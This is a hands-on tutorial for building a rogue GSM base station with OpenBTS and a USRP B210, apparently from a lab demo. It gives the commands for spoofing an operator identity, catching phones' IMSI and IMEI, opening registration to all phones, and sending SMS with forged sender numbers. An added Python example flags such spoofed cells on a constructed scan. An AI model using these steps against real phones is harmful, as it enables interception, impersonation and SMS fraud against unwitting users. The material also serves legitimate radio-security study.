We will use OpenBTS and a USRP B210 software defined radio to build a rogue GSM base station, which lets us send fake SMS, intercept SMS between users, and spoof a phone provider's identity.
- Ettus USRP B200mini/B210
- GHz antenna
- 5 GB of free disk space
- Some test phones for the experiments. We will catch the IMEI and IMSI of the test phones and whitelist them, so that no other user accidentally connects to the test network.
The official OpenBTS scripts assume they are being installed on an Ubuntu 16.04 "Xenial" system, so a virtual machine is the easiest way to use them. We use Vagrant to manage and provision the virtual machine.
First, install the needed tooling (VirtualBox and Vagrant) on the host computer:
make host-install
Reboot the machine so that the user group changes take effect.
Then, issue the following command, which installs the guest operating system and the needed tooling on it:
vagrant up
This will create the virtual machine according to the Vagrantfile and provision the guest operating system by calling the guest-install Makefile target. The operation took between 30 minutes and 1 hour.
Make sure the USRP B210 is connected to your machine, then connect to the virtual machine.
vagrant ssh
First, check that the radio is detected:
sudo uhd_find_devices
And that the radio is able to transmit:
cd ~/openbts-install/dev/openbts/debian/openbts/OpenBTS/
sudo ./transceiver
Now, inside the guest, issue each of the following commands in a separate terminal (use tmux):
cd ~/openbts-demo && make guest-launch-sipauth
cd ~/openbts-demo && make guest-launch-smqueue
cd ~/openbts-demo && make guest-launch-asterisk
cd ~/openbts-demo && make guest-launch-openbts
Now, you should see a red LED on for the TX/RX antenna and a green LED on for the RX2 antenna of the USRP.
cd ~/openbts-demo && make guest-launch-openbtscli
Now, you can type commands in the OpenBTSCLI command line interface (the OpenBTS> prompt). We assume that the following commands are typed at this prompt.
A phone and a base station are meant to be far from each other. Hence, it is important to keep the phone at least 50 cm away from the BS and to lower the receive gain to avoid clipping; 2 dB is a good value when the phone is close. Also set the transmission attenuation, e.g. 20 dB:
rxgain 2
power 20
Set up a spoofed network identity. You can find the MCC and MNC by looking at the file html/CellIFDinder.com - MCC MNC List.html. We chose an Italian operator that is not available in France. With a French SIM, you have to select it manually. With an Italian WIND SIM, it will be chosen automatically. If you want to use an operator that exists in the area, then you have to overpower its signal; we chose not to.
config GSM.Identity.ShortName WIND
config GSM.Identity.MCC 222
config GSM.Identity.MNC 88
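The identity configured above is exactly what a phone-side rogue-cell check looks for: a PLMN whose MCC does not match the country the other visible cells belong to, a PLMN absent from the operator table, or a ShortName that does not match the PLMN. The following is an added detection example, not code from the demo; the operator table, MCC-to-country map, ARFCN numbers and the scan are constructed for illustration.

```python
# Rogue-cell triage: flag scanned GSM cells whose PLMN does not fit the
# surrounding network, the pattern this demo creates (an Italian WIND
# identity broadcast in France). Added example; the operator table,
# country map and scan below are constructed, not data from the demo.
from collections import Counter

# Constructed subset of a PLMN table: (MCC, MNC) -> expected ShortName.
KNOWN_PLMNS = {
    ("208", "01"): "Orange F",
    ("208", "10"): "SFR",
    ("208", "20"): "Bouygues",
    ("222", "88"): "WIND",
}
MCC_COUNTRY = {"208": "FR", "222": "IT"}  # constructed subset

def local_mcc(scan):
    """Majority MCC among scanned cells: the country the phone is really in."""
    return Counter(c["mcc"] for c in scan).most_common(1)[0][0]

def cell_findings(cell, home_mcc):
    """Reasons a single cell looks out of place; empty list means nothing odd."""
    plmn = (cell["mcc"], cell["mnc"])
    reasons = []
    if cell["mcc"] != home_mcc:
        reasons.append(f"foreign MCC {cell['mcc']} ({MCC_COUNTRY.get(cell['mcc'], '??')}) "
                       f"while local MCC is {home_mcc}")
    expected = KNOWN_PLMNS.get(plmn)
    if expected is None:
        reasons.append(f"PLMN {plmn[0]}-{plmn[1]} not in operator table")
    elif cell["name"] and cell["name"] != expected:
        reasons.append(f"ShortName {cell['name']!r} does not match {expected!r}")
    return reasons

def triage(scan):
    """Return {ARFCN: [reasons]} for every cell with at least one finding."""
    home = local_mcc(scan)
    return {c["arfcn"]: r for c in scan if (r := cell_findings(c, home))}

# Constructed scan: three French carriers plus the demo's spoofed WIND cell.
SAMPLE_SCAN = [
    {"arfcn": 12,  "mcc": "208", "mnc": "01", "name": "Orange F"},
    {"arfcn": 77,  "mcc": "208", "mnc": "10", "name": "SFR"},
    {"arfcn": 990, "mcc": "208", "mnc": "20", "name": "Bouygues"},
    {"arfcn": 51,  "mcc": "222", "mnc": "88", "name": "WIND"},
]

if __name__ == "__main__":
    for arfcn, reasons in triage(SAMPLE_SCAN).items():
        print(f"ARFCN {arfcn}: " + "; ".join(reasons))
```

Only the WIND cell is reported on the sample scan; a genuine roaming cell near a border would also trigger the foreign-MCC rule, which is why the check is a triage signal rather than proof of a rogue BTS.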
Now, take a test phone and do a manual scan for networks. You should see a new carrier appear. Try to connect to the network (disabling mobile data and toggling airplane mode can help); you will get a failure, but this is enough to catch the IMSI/IMEI information. Look at the collected IMSIs:
tmsis
IMSI             TMSI  IMEI             AUTH  CREATED  ACCESSED  TMSI_ASSIGNED
2*************7  -     3*************0  0     3s       3s        0
We can authorize this specific test phone, a mobile station (MS), to register by its IMSI:
config Control.LUR.OpenRegistration 2*************7
Or authorize all MS to register with the following regular expression:
config Control.LUR.OpenRegistration .*
Now your phone can connect. You can send an SMS to the phone from any number you want.
sendsms 2*************7 0610102020 "Hey, you!"
At the end of the demonstration, reset the configuration:
rmconfig GSM.Identity.ShortName
rmconfig GSM.Identity.MCC
rmconfig GSM.Identity.MNC
rmconfig Control.LUR.OpenRegistration
If you add two phones, they can send each other messages. Once you are done, close all the programs. Then, halt the virtual machine.
vagrant halt